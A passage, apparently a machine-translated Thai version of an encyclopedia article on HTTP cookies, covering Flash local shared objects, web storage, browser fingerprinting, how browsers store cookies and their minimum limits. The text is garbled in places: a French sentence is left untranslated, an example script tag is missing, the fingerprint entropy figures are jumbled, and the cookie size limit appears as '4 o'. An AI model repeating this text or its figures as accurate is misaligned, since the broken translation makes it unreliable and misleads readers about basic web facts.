ประเด็นสุดท้ายนี้ ซึ่งทำให้นโยบายการจัดการคุกกี้แตกต่างจากนโยบายที่ใช้ร่วมกันในเครื่องของ Adobe ทำให้เกิดคำถาม เกี่ยวกับการจัดการการตั้งค่าความเป็นส่วนตัวของผู้ใช้: เขาต้องตระหนักว่าการจัดการคุกกี้ของเขาไม่มีผลกระทบต่อการจัดการวัตถุที่ใช้ร่วมกันในเครื่อง และในทางกลับกัน
ข้อวิจารณ์อีกประการหนึ่งของระบบนี้คือสามารถใช้ผ่านปลั๊กอิน Adobe Flash Player ซึ่งเป็นกรรมสิทธิ์และไม่ใช่มาตรฐานเว็บ
ความคงอยู่ของฝั่งไคลเอ็นต์
เว็บเบราว์เซอร์บางตัวสนับสนุนกลไกการคงอยู่ตามสคริปต์ ซึ่งช่วยให้เพจสามารถเก็บข้อมูลไว้ในเครื่องเพื่อใช้ในภายหลัง ตัวอย่างเช่น Internet Explorer สนับสนุนข้อมูลที่คงอยู่ถาวรในประวัติเบราว์เซอร์ ในบุ๊กมาร์ก ในรูปแบบที่จัดเก็บใน XML หรือโดยตรงกับหน้าเว็บที่บันทึกไว้ในดิสก์ สำหรับ Microsoft Internet Explorer 5 มีวิธีการใช้ข้อมูลผู้ใช้ผ่านพฤติกรรม DHTML
W3C นำเสนอ JavaScript API ใหม่ใน HTML 5 สำหรับการจัดเก็บข้อมูลฝั่งไคลเอ็นต์ที่เรียกว่าที่เก็บข้อมูลบนเว็บ และมีวัตถุประสงค์เพื่อแทนที่คุกกี้อย่างถาวร คล้ายกับคุกกี้แต่มีความสามารถที่ดีขึ้นอย่างมากและไม่มีการจัดเก็บข้อมูลในส่วนหัวของคำขอ HTTP API อนุญาตให้มีที่เก็บข้อมูลบนเว็บสองประเภท: localstorage และ sessionstorage ซึ่งคล้ายกับคุกกี้ถาวรและคุกกี้เซสชัน (ยกเว้นว่าคุกกี้เซสชันจะหมดอายุเมื่อเบราว์เซอร์ปิดในขณะที่ เซสชั่นสตอเรจ หมดอายุเมื่อปิดแท็บ) ตามลำดับ ที่เก็บข้อมูลบนเว็บรองรับโดย Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 และ Opera 10.50
กลไกอื่นโดยปกติอาศัยการแคชของเบราว์เซอร์ (ในหน่วยความจำแทนที่จะรีเฟรช) โดยใช้โปรแกรม JavaScript ในหน้าเว็บ
ตัวอย่างเช่น หน้าสามารถมีแท็ก . La première fois que la page se charge, le programme exemple.js est aussi chargé.
ณ จุดนี้ โปรแกรมยังคงอยู่ในหน่วยความจำแคชและหน้าที่เยี่ยมชมจะไม่โหลดซ้ำเป็นครั้งที่สอง ดังนั้น หากโปรแกรมมีตัวแปรส่วนกลาง (เช่น var id = 3243242;) ตัวระบุนี้ยังคงใช้ได้และสามารถใช้รหัส JavaScript อื่นได้เมื่อโหลดหน้าเว็บอีกครั้ง หรือเมื่อโหลดหน้าเว็บที่เชื่อมโยงโปรแกรมแล้ว
ข้อเสียที่สำคัญของวิธีนี้คือตัวแปรส่วนกลางของ JavaScript จะต้องเป็นแบบคงที่ หมายความว่าไม่สามารถเปลี่ยนแปลงหรือลบได้เหมือนคุกกี้
ลายนิ้วมือของเว็บเบราว์เซอร์
ลายนิ้วมือของเบราว์เซอร์คือข้อมูลที่รวบรวมเกี่ยวกับการตั้งค่าการกำหนดค่าของเบราว์เซอร์เพื่อวัตถุประสงค์ในการระบุตัวตน ลายนิ้วมือเหล่านี้สามารถใช้เพื่อระบุผู้ใช้อินเทอร์เน็ตหรืออุปกรณ์ได้ทั้งหมดหรือบางส่วน แม้ว่าจะปิดใช้งานคุกกี้ก็ตาม
ข้อมูลการกำหนดค่าเว็บเบราว์เซอร์พื้นฐานได้รับการรวบรวมโดยบริการผู้ชมเว็บไซต์มานานแล้ว เพื่อจุดประสงค์ในการวัดปริมาณการใช้เว็บของมนุษย์อย่างแม่นยำและตรวจจับการคลิกหลอกลวงในรูปแบบต่างๆ ด้วยความช่วยเหลือจากภาษาสคริปต์ฝั่งไคลเอนต์ การรวบรวมข้อมูลที่แม่นยำยิ่งขึ้นก็คือ ตอนนี้เป็นไปได้.
การแปลงข้อมูลนี้เป็นสตริงบิตจะสร้างลายนิ้วมือของอุปกรณ์ ในปี 2010 Electronic Frontier Foundation (EFF) วัดค่าเอนโทรปีของลายนิ้วมือของเบราว์เซอร์เป็นอย่างน้อย บิต 18,1และนั่นคือก่อนที่ความก้าวหน้าในการพิมพ์ลายนิ้วมือบนผืนผ้าใบจะเพิ่ม 5,7 บิตให้กับเอนโทรปีนั้น
คุกกี้โดยสังเขป
คุกกี้คือไฟล์ข้อความขนาดเล็กที่เว็บเบราว์เซอร์จัดเก็บไว้บนฮาร์ดไดรฟ์ของผู้เข้าชมเว็บไซต์ และถูกใช้ (เหนือสิ่งอื่นใด) เพื่อบันทึกข้อมูลเกี่ยวกับผู้เข้าชมหรือการเดินทางผ่านไซต์ เว็บมาสเตอร์สามารถจดจำพฤติกรรมของผู้เข้าชมและปรับแต่งการนำเสนอไซต์ของตนสำหรับผู้เข้าชมแต่ละราย จากนั้นคุกกี้จะทำให้สามารถจดจำจำนวนบทความที่จะแสดงบนโฮมเพจหรือแม้แต่เก็บข้อมูลรับรองการเข้าสู่ระบบสำหรับปาร์ตี้ส่วนตัว: เมื่อผู้เยี่ยมชมกลับมาที่ไซต์ ไม่จำเป็นต้องพิมพ์ชื่อและรหัสผ่านอีกต่อไป ได้รับการยอมรับ เนื่องจากจะถูกอ่านโดยอัตโนมัติในคุกกี้
คุกกี้มีอายุการใช้งานที่จำกัด ซึ่งกำหนดโดยผู้ออกแบบเว็บไซต์ นอกจากนี้ยังสามารถหมดอายุเมื่อสิ้นสุดเซสชันบนเว็บไซต์ ซึ่งสอดคล้องกับการปิดเบราว์เซอร์ มีการใช้คุกกี้กันอย่างแพร่หลายเพื่อทำให้ชีวิตง่ายขึ้นสำหรับผู้เยี่ยมชมและนำเสนอข้อมูลที่เกี่ยวข้องมากขึ้น แต่เทคนิคพิเศษทำให้สามารถติดตามผู้เยี่ยมชมในหลาย ๆ ไซต์ได้ ดังนั้นจึงสามารถรวบรวมและตรวจสอบข้อมูลที่กว้างขวางมากเกี่ยวกับพฤติกรรมของเขาได้ วิธีนี้ทำให้การใช้คุกกี้มีชื่อเสียงในฐานะเทคนิคการเฝ้าระวังที่ละเมิดความเป็นส่วนตัวของผู้เยี่ยมชม ซึ่งน่าเสียดายที่สอดคล้องกับความเป็นจริงในหลายกรณีของการใช้งานด้วยเหตุผลที่ไม่ใช่ด้านเทคนิคหรือไม่เคารพความคาดหวังของผู้ใช้
เพื่อตอบสนองต่อความกลัวที่ถูกต้องตามกฎหมายเหล่านี้ HTML 5 จึงแนะนำ JavaScript API ใหม่สำหรับการจัดเก็บข้อมูลฝั่งไคลเอ็นต์ที่เรียกว่าที่เก็บข้อมูลบนเว็บ ซึ่งมีความปลอดภัยมากขึ้นและมีความจุมากขึ้น โดยมีจุดประสงค์เพื่อแทนที่คุกกี้
การจัดเก็บคุกกี้
ในบางเบราว์เซอร์ คุกกี้สามารถแก้ไขได้ง่าย โปรแกรมแก้ไขข้อความธรรมดาอย่าง Notepad ก็เพียงพอแล้วที่จะเปลี่ยนค่าด้วยตนเอง
คุกกี้จะถูกบันทึกแตกต่างกันไปตามเบราว์เซอร์:
- Microsoft Internet Explorer ที่ บันทึกแต่ละคุกกี้ในไฟล์อื่น
- Mozilla Firefox บันทึกคุกกี้ทั้งหมดในไฟล์เดียว
- Opera บันทึกคุกกี้ทั้งหมดในไฟล์เดียวและเข้ารหัส (ไม่สามารถแก้ไขได้ยกเว้นในตัวเลือกซอฟต์แวร์)
- Apple Safari บันทึกคุกกี้ทั้งหมดในไฟล์นามสกุล .plist ไฟล์เดียว การปรับเปลี่ยนเป็นไปได้แต่ไม่ง่ายนัก เว้นแต่คุณจะผ่านตัวเลือกซอฟต์แวร์
เบราว์เซอร์จำเป็นต้องรองรับ อย่างน้อย :
- 300 คุกกี้พร้อมกัน
- 4 o ต่อคุกกี้;
- 20 คุกกี้ต่อโฮสต์หรือโดเมน
